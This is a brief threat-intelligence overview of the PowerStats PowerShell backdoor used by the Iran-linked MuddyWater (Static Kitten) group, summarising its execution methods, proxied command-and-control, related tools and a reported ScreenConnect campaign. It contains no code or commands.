POWERSTATS

PowerStats is a malicious software (malware) created by the MuddyWater cyberespionage group, which is linked to Iran. This malware, written in PowerShell, was designed to exploit and damage computer systems, often infiltrating them without the user's knowledge through suspicious downloads, emails, or websites. Once inside a system, PowerStats can steal personal information, disrupt operations, or even hold data for ransom. The malware was initially used as a backdoor program by MuddyWater, but the group later shifted to using remote management software, according to Sekoia's advisory. The execution of the PowerStats payload has been carried out via various methods including CMSTP.exe, JavaScript files, mshta.exe, Virtual Basic Script (VBS) files, and macros. For instance, MuddyWater used mshta.exe not only to execute its PowerStats payload but also to pass a PowerShell one-liner for execution. To obfuscate the Command and Control (C2) location, MuddyWater controlled PowerStats from behind a proxy network. The group has also developed other malware sets such as PowGoop, Small Sieve, Canopy/Starwhale, Mori, and PowerStats for loading malware, backdoor access, persistence, and exfiltration. A new campaign likely attributed to Static Kitten, another name for the MuddyWater group, has been uncovered by Anomali Threat Research. Consistent with previous Static Kitten activity, this campaign uses tactics, techniques, and procedures that include the use of ScreenConnect launch parameters designed to target any MOFA with mfa[.]gov as part of the custom field. The group continues to use the PowerStats backdoor, running PowerShell scripts to maintain persistent access to victim systems, and multiple malware sets for various malicious activities.